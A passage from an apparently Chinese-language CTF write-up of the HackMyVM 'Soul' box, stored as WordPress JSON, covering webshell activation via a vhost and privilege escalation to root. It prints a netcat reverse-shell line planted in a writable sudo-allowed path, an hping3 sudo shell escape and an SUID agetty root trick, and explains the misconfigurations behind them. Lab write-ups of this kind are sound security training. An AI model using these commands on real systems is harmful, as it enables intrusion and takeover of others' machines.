unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache&#039;s document root\n        # concurs with nginx&#039;s one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order 
to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. 
These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Virtual Host configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink that\n# to sites-enabled\/ to enable it.\n#\nserver {\n        listen 80;\n        listen [::]:80;\n#\n        server_name lonelysoul.hmv;\n#\n        root \/var\/www\/html;\n        index index.html;\n#\n        location \/ {\n                try_files $uri $uri\/ =404;\n        }\n\n # pass PHP scripts to FastCGI server\n        #\n               location ~ \\.php$ {\n               include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n               fastcgi_pass unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        }\n}<\/code><\/pre>\n<p>\u53d1\u73b0\u5f88\u660e\u663e\uff0c\u666e\u901a\u8def\u7531（默认的 <code>default_server<\/code> 块，其中 PHP 的 <code>location<\/code> 被注释掉了）\u4e0d\u4f1a\u5c06\u6587\u4ef6\u4f20\u7ed9<code>FastCGI server<\/code>\u89e3\u6790\uff0c\u4f46\u662f<code>lonelysoul.hmv<\/code>\u7684\u8def\u7531\u4f1a\u4f20\u9012\u8fdb\u884c\u89e3\u6790\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u505a\u4e00\u4e2a\u57df\u540d\u89e3\u6790（在本机的 hosts 文件里加一条记录）\u518d\u5c1d\u8bd5\u8bbf\u95ee\u5373\u53ef\uff01<\/p>\n<pre><code class=\"language-bash\">192.168.10.100  lonelysoul.hmv<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/lonelysoul.hmv\/webshell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447076.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447076.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612143617576\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743gabriel<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@soul:\/$ cd ~\n(remote) www-data@soul:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on soul:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on soul:\n    (gabriel) NOPASSWD: \/tmp\/whoami\n(remote) www-data@soul:\/var\/www$ cat \/tmp\/whoami\ncat: \/tmp\/whoami: No such file or directory\n(remote) www-data@soul:\/var\/www$ cd \/tmp\n(remote) www-data@soul:\/tmp$ ls -la\ntotal 32\ndrwxrwxrwt  8 root root 4096 Jun 12 02:09 .\ndrwxr-xr-x 18 root root 4096 Nov 26  2020 ..\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .ICE-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .Test-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .X11-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .XIM-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .font-unix\ndrwx------  3 root root 4096 Jun 12 01:31 systemd-private-d1d32f236a414475a274f8e1311ae999-systemd-timesyncd.service-1oMFsR<\/code><\/pre>\n<p>\u5929\u52a9\u6211\u4e5f\uff0c\u4ee5\u7528\u6237\u6743\u9650\u6267\u884c\u53ef\u81ea\u5b9a\u4e49\u7684\u6076\u610f\u4ee3\u7801\uff01\uff01\uff01sudo 规则放行的 <code>\/tmp\/whoami<\/code> 并不存在，而 <code>\/tmp<\/code> 对所有用户可写，所以 www-data 可以自己创建这个文件，再以 gabriel 的身份运行。根本问题在于 sudoers 里的命令路径落在了低权限用户可写的目录中。<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@soul:\/tmp$ echo &#039;nc -e \/bin\/bash 192.168.10.106 2345&#039; &gt; whoami\n(remote) www-data@soul:\/tmp$ chmod +x 
whoami\n(remote) www-data@soul:\/tmp$ sudo -u gabriel \/tmp\/whoami\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found\n<\/code><\/pre>\n<p>\u53e6\u4e00\u8fb9\u53d1\u73b0\u5f39\u8fc7\u6765\u4e86\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447077.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447077.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612143930157\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743peter<\/h3>\n<pre><code class=\"language-bash\">(remote) gabriel@soul:\/home\/gabriel$ sudo -l\nMatching Defaults entries for gabriel on soul:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser gabriel may run the following commands on soul:\n    (peter) NOPASSWD: \/usr\/sbin\/hping3\n(remote) gabriel@soul:\/home\/gabriel$ cat user.txt \nHMViwazhere\n(remote) gabriel@soul:\/home\/gabriel$ \/usr\/sbin\/hping3 -h\nusage: hping3 host [options]\n  -h  --help      show this help\n  -v  --version   show version\n  -c  --count     packet count\n  -i  --interval  wait (uX for X microseconds, for example -i u1000)\n      --fast      alias for -i u10000 (10 packets for second)\n      --faster    alias for -i u1000 (100 packets for second)\n      --flood      sent packets as fast as possible. 
Don&#039;t show replies.\n  -n  --numeric   numeric output\n  -q  --quiet     quiet\n  -I  --interface interface name (otherwise default routing interface)\n  -V  --verbose   verbose mode\n  -D  --debug     debugging info\n  -z  --bind      bind ctrl+z to ttl           (default to dst port)\n  -Z  --unbind    unbind ctrl+z\n      --beep      beep for every matching packet received\nMode\n  default mode     TCP\n  -0  --rawip      RAW IP mode\n  -1  --icmp       ICMP mode\n  -2  --udp        UDP mode\n  -8  --scan       SCAN mode.\n                   Example: hping --scan 1-30,70-90 -S www.target.host\n  -9  --listen     listen mode\nIP\n  -a  --spoof      spoof source address\n  --rand-dest      random destionation address mode. see the man.\n  --rand-source    random source address mode. see the man.\n  -t  --ttl        ttl (default 64)\n  -N  --id         id (default random)\n  -W  --winid      use win* id byte ordering\n  -r  --rel        relativize id field          (to estimate host traffic)\n  -f  --frag       split packets in more frag.  
(may pass weak acl)\n  -x  --morefrag   set more fragments flag\n  -y  --dontfrag   set don&#039;t fragment flag\n  -g  --fragoff    set the fragment offset\n  -m  --mtu        set virtual mtu, implies --frag if packet size &gt; mtu\n  -o  --tos        type of service (default 0x00), try --tos help\n  -G  --rroute     includes RECORD_ROUTE option and display the route buffer\n  --lsrr           loose source routing and record route\n  --ssrr           strict source routing and record route\n  -H  --ipproto    set the IP protocol field, only in RAW IP mode\nICMP\n  -C  --icmptype   icmp type (default echo request)\n  -K  --icmpcode   icmp code (default 0)\n      --force-icmp send all icmp types (default send only supported types)\n      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)\n      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)\n      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)\n      --icmp-help  display help for others icmp options\nUDP\/TCP\n  -s  --baseport   base source port             (default random)\n  -p  --destport   [+][+]&lt;port&gt; destination port(default 0) ctrl+z inc\/dec\n  -k  --keep       keep still source port\n  -w  --win        winsize (default 64)\n  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen \/ 4)\n  -Q  --seqnum     shows only tcp sequence number\n  -b  --badcksum   (try to) send packets with a bad IP checksum\n                   many systems will fix the IP checksum sending the packet\n                   so you&#039;ll get bad UDP\/TCP checksum instead.\n  -M  --setseq     set TCP sequence number\n  -L  --setack     set TCP ack\n  -F  --fin        set FIN flag\n  -S  --syn        set SYN flag\n  -R  --rst        set RST flag\n  -P  --push       set PUSH flag\n  -A  --ack        set ACK flag\n  -U  --urg        set URG flag\n  -X  --xmas       set X unused flag (0x40)\n  -Y  --ymas       set Y unused flag (0x80)\n  --tcpexitcode    use last 
tcp-&gt;th_flags as exit code\n  --tcp-mss        enable the TCP MSS option with the given value\n  --tcp-timestamp  enable the TCP timestamp option to guess the HZ\/uptime\nCommon\n  -d  --data       data size                    (default is 0)\n  -E  --file       data from file\n  -e  --sign       add &#039;signature&#039;\n  -j  --dump       dump packets in hex\n  -J  --print      dump printable characters\n  -B  --safe       enable &#039;safe&#039; protocol\n  -u  --end        tell you when --file reached EOF and prevent rewind\n  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)\n  --tr-stop        Exit when receive the first not ICMP in traceroute mode\n  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop\n  --tr-no-rtt       Don&#039;t calculate\/show RTT information in traceroute mode\nARS packet description (new, unstable)\n  --apd-send       Send the packet described with APD (see docs\/APD.txt)<\/code><\/pre>\n<p>发现 GTFOBins 上有现成的记录（严格来说这不是 hping3 本身的漏洞，而是 sudoers 配置不当：hping3 不带参数会进入交互模式，在里面可以直接执行 shell 命令，所以这条规则相当于把 peter 的 shell 交给了 gabriel）：<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/hping3\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/hping3\/#sudo<\/a><\/p>\n<pre><code class=\"language-bash\">sudo hping3\n\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447078.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447078.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612144155402\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">peter@soul:\/home\/gabriel$ cd ~\npeter@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 3 peter peter 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root  root  4096 Nov 26  2020 ..\n-rw-r--r-- 1 peter peter  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 peter peter 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 peter peter  807 Nov 26  2020 .profile\ndrwx------ 2 peter peter 4096 Nov 26  2020 .ssh\npeter@soul:~$ cd .ssh\npeter@soul:~\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 peter peter 4096 Nov 26  2020 .\ndrwxr-xr-x 3 peter peter 4096 Nov 26  2020 ..\n-rw-r--r-- 1 peter peter  392 Nov 26  2020 authorized_keys\n-rw------- 1 peter peter 1811 Nov 26  2020 id_rsa\n-rw-r--r-- 1 peter peter  392 Nov 26  2020 id_rsa.pub\npeter@soul:~\/.ssh$ echo $SHELL\n\/bin\/bash\npeter@soul:~\/.ssh$ ssh-keygen -y -f id_rsa\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC66JJyq6c+fFjcR\/irMeVryuVZO6ixS\/vcuTDwvV4uwQehPeOWDYUDHVdt1bhJHIjQ+nt+L2y281Fl4JGJLdUpogZjrh+YDMP1oUBjbtHASdI02yWsZ99qw79gJe695OjW5uVvfEJMDkRnrscqvddkbfoPV7XCble0LVHq+3FgET+WkZVUr8nQHq1cz9lF5B8ez4yWfMG5nLOVR9pm8sXxIhWAQitAESKyVKeBmNrlhwx4XO0fW5V\/Ld0N3fuupSD3AUbq\/++gU59CNFaYY50GF+xw1awzHY\/ZvR963BVwKNzKRfpC2OHKFq\/ple5t+BosahGQt3WcMSi5OICDXJeT\npeter@soul:~\/.ssh$ cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC66JJyq6c+fFjcR\/irMeVryuVZO6ixS\/vcuTDwvV4uwQehPeOWDYUDHVdt1bhJHIjQ+nt+L2y281Fl4JGJLdUpogZjrh+YDMP1oUBjbtHASdI02yWsZ99qw79gJe695OjW5uVvfEJMDkRnrscqvddkbfoPV7XCble0LVHq+3FgET+WkZVUr8nQHq1cz9lF5B8ez4yWfMG5nLOVR9pm8sXxIhWAQitAESKyVKeBmNrlhwx4XO0fW5V\/Ld0N3fuupSD3AUbq\/++gU59CNFaYY50GF+xw1awzHY\/ZvR963BVwKNzKRfpC2OHKFq\/ple5t+BosahGQt3WcMSi5OICDXJeT peter@soul<\/code><\/pre>\n<p>\u8fd9\u91cc\u5e94\u8be5\u6ca1\u5565\u4e8b\uff1a<\/p>\n<pre><code class=\"language-bash\">peter@soul:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for peter: \npeter@soul:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/sbin\/agetty\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device<\/code><\/pre>\n<p>突然想起来之前的那个<code>agetty<\/code>（上面的 SUID 列表里有 \/usr\/sbin\/agetty，通常它是不带 SUID 位的）可以尝试提权！<\/p>\n<pre><code class=\"language-bash\">peter@soul:~$ \/usr\/sbin\/agetty -o -p -l \/bin\/bash -a root tty\n\nDebian GNU\/Linux 10 soul tty\n\nsoul login: root (automatic login)\n\npeter@soul:~# whoami;id\nroot\nuid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)<\/code><\/pre>\n<p>这里只有 euid 变成了 0，uid 还是 peter，看看能不能读取相关文件：<\/p>\n<pre><code class=\"language-bash\">peter@soul:~# cd \/root \npeter@soul:\/root# ls -la\ntotal 28\ndrwx------  4 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 18 root root 4096 Nov 26  2020 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Nov 26  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Nov 26  2020 .ssh\n-rw-------  1 root root   11 Nov 26  2020 rootflag.txt\npeter@soul:\/root# cat rootflag.txt \nHMVohmygod<\/code><\/pre>\n<p>\u4e00\u5207\u6b63\u5e38\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Soul \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-861","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=861"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions"}],"predecessor-version":[{"id":862,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions\/862"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=861"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}